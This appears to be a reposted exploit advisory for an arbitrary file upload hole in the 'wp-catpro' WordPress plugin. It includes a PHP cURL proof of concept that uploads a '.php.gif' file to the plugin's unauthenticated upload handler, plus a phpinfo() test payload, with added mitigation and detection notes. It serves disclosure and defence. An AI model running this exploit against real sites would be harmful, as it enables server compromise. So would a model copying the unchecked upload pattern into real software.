WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------#
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
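<?php
// Advisory proof-of-concept: POSTs a file whose name carries a double
// extension (".php.gif") to the plugin's swfupload handler. The handler's
// allowed-extension list quoted above is ("jpg", "gif", "png"), so the
// trailing ".gif" satisfies the check.
//
// Reading this PoC from the defender's side:
//   - The request carries no WordPress session cookie and no nonce, which
//     suggests upload.php performs no capability or nonce check — confirm
//     against the plugin source rather than relying on this PoC.
//   - The 'folder' field is client-supplied; whether the handler constrains
//     it is not shown on this page.
//   - Whether a ".php.gif" name is executed as PHP depends on the web
//     server's handler configuration, which this page does not show.
//   - Mitigation: require authentication and a nonce on upload.php, validate
//     the *final* extension and content server-side, ignore client-supplied
//     paths, and serve wp-content/uploads/ with PHP execution disabled.
//   - Detection: POSTs to
//     wp-content/plugins/wp-catpro/js/swfupload/js/upload.php and new files
//     matching *.php.* under wp-content/uploads/catpro/.

$uploadfile = "zik.php.gif";   // local file to send; only its name matters here
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the legacy cURL file-upload syntax (pre-PHP 5.5 CURLFile).
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// The original advisory placed this note as bare text inside the PHP tags,
// which is a parse error; it is kept here as a comment.
// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>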
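<?php
// Contents of the uploaded file ("zik.php.gif" above): a phpinfo() call used
// as proof that the upload is executed as PHP, not a functional shell.
// From the defender's side, a request for a *.php.* file under
// wp-content/uploads/ returning phpinfo output, or any upload containing
// "<?php", is a strong indicator of compromise.
phpinfo();
?>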